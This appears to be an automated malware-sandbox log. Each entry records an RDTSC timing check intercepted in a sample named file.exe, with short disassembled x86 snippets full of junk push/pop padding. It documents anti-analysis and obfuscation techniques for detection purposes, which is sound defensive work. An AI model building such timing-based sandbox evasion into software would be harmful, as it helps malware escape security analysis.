                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 927484 second address: 9274A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Dh 0x00000007 jnl 00007F98219BDB66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9274A1 second address: 9274BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F9820CD6B9Bh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jns 00007F9820CD6B98h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8BA163 second address: 8BA167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD020 second address: 8FD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD025 second address: 8FD070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F98219BDB72h 0x00000011 nop 0x00000012 jmp 00007F98219BDB77h 0x00000017 lea eax, dword ptr [ebp+1247EDE0h] 0x0000001d xor dword ptr [ebp+122D35B9h], edx 0x00000023 nop 0x00000024 push esi 0x00000025 jng 00007F98219BDB6Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD070 second address: 8FD080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jbe 00007F9820CD6BAFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD080 second address: 8DD219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, 2A659000h 0x0000000f call dword ptr [ebp+122D20A0h] 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F98219BDB73h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD117 second address: 8FD1D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9820CD6BA2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebx 0x00000010 jmp 00007F9820CD6BA8h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c or dword ptr [ebp+1244ED40h], ebx 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov ch, 67h 0x0000002b mov dword ptr [ebp+1247EE38h], esp 0x00000031 mov dword ptr [ebp+122D35C0h], edi 0x00000037 cmp dword ptr [ebp+122D2A77h], 00000000h 0x0000003e jne 00007F9820CD6C47h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007F9820CD6B98h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov edi, dword ptr [ebp+122D2CCFh] 0x00000064 adc dx, 086Ah 0x00000069 mov byte ptr [ebp+122D3068h], 00000047h 0x00000070 mov cx, ax 0x00000073 mov eax, D49AA7D2h 0x00000078 add edx, 4760993Fh 0x0000007e push eax 0x0000007f pushad 0x00000080 jmp 00007F9820CD6BA0h 0x00000085 pushad 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD4D1 second address: 8FD4D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD4D5 second address: 8FD4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9820CD6BA2h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD4EF second address: 8FD4F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD58A second address: 8FD58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD58F second address: 8FD5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4C1E7121h 0x00000010 sub ecx, dword ptr [ebp+122D2A03h] 0x00000016 push E5E6CE84h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F98219BDB72h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD701 second address: 8FD714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dx, si 0x0000000d nop 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD714 second address: 8FD728 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98219BDB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD728 second address: 8FD72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD72E second address: 8FD732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FD9E6 second address: 8FD9F0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FDEEE second address: 8FDEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FDEF2 second address: 8FDEF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FDEF8 second address: 8FDEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FE156 second address: 8FE173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9820CD6B9Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FE173 second address: 8FE177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FE177 second address: 8FE181 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8FE181 second address: 8FE1D5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F98219BDB7Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov cl, C1h 0x0000000d lea eax, dword ptr [ebp+1247EE24h] 0x00000013 pushad 0x00000014 jnl 00007F98219BDB6Ch 0x0000001a pushad 0x0000001b mov ecx, dword ptr [ebp+122D2ABBh] 0x00000021 mov eax, dword ptr [ebp+122D211Ah] 0x00000027 popad 0x00000028 popad 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F98219BDB6Dh 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE1D5 second address: 8DDD21 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9820CD6B9Ch 0x00000008 jc 00007F9820CD6B96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F9820CD6BA7h 0x00000016 nop 0x00000017 jmp 00007F9820CD6B9Ah 0x0000001c lea eax, dword ptr [ebp+1247EDE0h] 0x00000022 and edx, dword ptr [ebp+122D2CBBh] 0x00000028 push eax 0x00000029 jmp 00007F9820CD6BA2h 0x0000002e mov dword ptr [esp], eax 0x00000031 cmc 0x00000032 call dword ptr [ebp+122D2E26h] 0x00000038 pushad 0x00000039 pushad 0x0000003a push esi 0x0000003b pop esi 0x0000003c pushad 0x0000003d popad 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 jl 00007F9820CD6B96h 0x00000046 popad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E0F4 second address: 92E104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F98219BDB66h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E239 second address: 92E23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E23D second address: 92E241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E241 second address: 92E24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F9820CD6B98h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E3AC second address: 92E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E3B0 second address: 92E3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E3B6 second address: 92E3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F98219BDB6Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E670 second address: 92E675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E675 second address: 92E67B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E67B second address: 92E681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E681 second address: 92E685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E685 second address: 92E689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932287 second address: 9322AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Ch 0x00000007 jmp 00007F98219BDB6Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322AB second address: 9322AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322AF second address: 9322B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376C5 second address: 9376C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376C9 second address: 9376CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376CF second address: 9376D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376D8 second address: 9376DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376DE second address: 9376FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jne 00007F9820CD6B96h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jc 00007F9820CD6B96h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9376FD second address: 937706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93796B second address: 937996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9820CD6BA0h 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9820CD6BA1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE25 second address: 93FE2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE2B second address: 93FE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE31 second address: 93FE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FE35 second address: 93FE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6BA9h 0x00000007 jmp 00007F9820CD6B9Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F9820CD6B96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9EA second address: 93E9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E9F0 second address: 93E9F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EB2B second address: 93EB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93EB31 second address: 93EB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9820CD6B9Eh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECA0 second address: 93ECA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECA9 second address: 93ECC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9820CD6BA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93ECC1 second address: 93ECC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F0A3 second address: 93F0DC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9820CD6BB2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c jne 00007F9820CD6B96h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F9820CD6B96h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F3E9 second address: 93F3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F3EE second address: 93F40E instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9820CD6BB2h 0x00000008 jmp 00007F9820CD6BA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F886 second address: 93F88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F88A second address: 93F8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9820CD6BA7h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F8A7 second address: 93F8B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB6Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FCA5 second address: 93FCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9418E6 second address: 9418F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F98219BDB66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9418F4 second address: 94190F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F9820CD6B9Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B020E second address: 8B0214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9456F8 second address: 945709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9820CD6B9Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945709 second address: 945713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945713 second address: 945717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945717 second address: 94571B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947851 second address: 947860 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9820CD6B9Ah 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947992 second address: 947999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951458 second address: 951460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951460 second address: 951465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951465 second address: 95146B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95146B second address: 951475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98219BDB66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FDC5B second address: 8FDC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9518B0 second address: 9518BA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98219BDB66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953D2F second address: 953D39 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9820CD6B9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 957373 second address: 957392 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB79h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9574C4 second address: 9574D4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9820CD6B96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D789 second address: 95D7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98219BDB73h 0x00000009 jmp 00007F98219BDB6Bh 0x0000000e jmp 00007F98219BDB72h 0x00000013 popad 0x00000014 jc 00007F98219BDB68h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D7C6 second address: 95D7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E04F second address: 95E05F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F98219BDB72h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E05F second address: 95E076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9820CD6B96h 0x0000000a jmp 00007F9820CD6B9Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E076 second address: 95E07C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E07C second address: 95E080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E5F4 second address: 95E604 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F98219BDB66h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E604 second address: 95E608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EE41 second address: 95EE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F98219BDB76h 0x0000000d jmp 00007F98219BDB79h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EE78 second address: 95EE7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F138 second address: 95F15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98219BDB79h 0x00000007 ja 00007F98219BDB66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
